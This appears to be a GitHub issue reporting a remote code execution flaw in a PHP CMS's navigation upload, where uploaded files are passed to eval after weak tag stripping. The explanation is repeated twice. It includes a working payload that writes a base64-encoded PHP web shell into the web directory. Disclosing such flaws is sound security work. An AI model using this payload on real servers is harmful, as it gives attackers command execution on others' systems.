You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
if (empty($file))
{
return FALSE;
}
// strip any php tags
$file = str_replace('<?php', '', $file);
// run xss_clean on it
$file = xss_clean($file);
// now evaluate the string to get the nav array
@eval($file);`
Only uploaded code <? Php tags replaced with spaces And filtered the xss tags.
Then executed the code @eval ($ file);
So we can construct php code to write webshell to web directory.
code:
file_put_contents("aaaaaa.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWydpZCddKTs/Pg=="));
Because the <? Php tag is filtered, we use base64 to encode the command execution code
Then upload
Although the error is prompted, our code has been executed, and we can see the generated files on the web and directories.
The text was updated successfully, but these errors were encountered:
upload function:
![c2](https://user-images.githubusercontent.com/9522862/74326673-c3608480-4dc5-11ea-89d8-9246baff623c.png)
$This-> fuel-> navigation-> upload ($ params) was called
$This-> fuel-> navigation-> upload function:
![c3](https://user-images.githubusercontent.com/9522862/74326859-1cc8b380-4dc6-11ea-9695-4dc3963702ca.png)
` $file = read_file($file_path);
Only uploaded code <? Php tags replaced with spaces And filtered the xss tags.
![c4](https://user-images.githubusercontent.com/9522862/74327409-1e46ab80-4dc7-11ea-90fa-d24623c02f28.png)
Then executed the code @eval ($ file);
So we can construct php code to write webshell to web directory.
code:
file_put_contents("aaaaaa.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWydpZCddKTs/Pg=="));
Because the <? Php tag is filtered, we use base64 to encode the command execution code
Then upload
Although the error is prompted, our code has been executed, and we can see the generated files on the web and directories.
The text was updated successfully, but these errors were encountered: